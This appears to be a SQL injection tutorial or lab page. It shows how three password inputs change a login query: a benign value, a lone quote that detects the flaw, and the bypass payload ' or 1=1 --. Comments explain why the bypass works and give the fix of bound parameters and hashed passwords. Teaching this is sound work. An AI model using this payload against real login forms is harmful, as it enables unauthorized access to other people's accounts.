Password:
password
Result:
-- Query the login issues when the password field holds the benign value: password
-- The submitted text appears verbatim between the quotes of the pass literal,
-- which is consistent with the application pasting form values into the SQL
-- string instead of binding them as parameters (inferred from the examples on
-- this page; the application code itself is not shown).
-- NOTE(review): pass is compared against the submitted plaintext, so passwords
-- may be stored unhashed — confirm against the schema.
SELECT *
FROM users
WHERE
email = '[email protected]'
AND pass = 'password' LIMIT 1
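Use this input to check for the vulnerability: a lone single quote leaves the string literal unterminated, so a database error means the password value reaches the query unescaped.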
Password:
'
Result:
-- Query produced when the password field holds a single quote: '
-- The extra quote leaves an odd number of quotes after "pass =", so the string
-- literal is never terminated and the database rejects the statement.
-- For defenders: a SQL syntax error raised by a login request is a useful
-- detection signal, and the response should stay generic rather than echo
-- database error detail (whether this application echoes it is not shown here).
SELECT *
FROM users
WHERE
email = '[email protected]'
-- ERROR: the quotes on the next line are unbalanced
AND pass = ''' LIMIT 1
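With this input the login succeeds and the application returns a session / JWT token, because the password check is no longer enforced by the query.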
Password:
' or 1=1 --
Result:
-- Query produced when the password field holds: ' or 1=1 --
-- AND binds tighter than OR, so the predicate reads
-- (email = ... AND pass = '') OR 1=1 and is true for every row in users.
-- The trailing -- turns the application's own closing quote and LIMIT 1 into
-- a comment, so neither the password check nor the row limit applies.
-- Fix: send email and password as bound parameters (placeholders) so input
-- cannot change the statement's structure, and verify the password against a
-- salted hash in application code instead of comparing it in the WHERE clause.
SELECT *
FROM users
WHERE
email = '[email protected]'
AND pass = '' or 1=1 --' LIMIT 1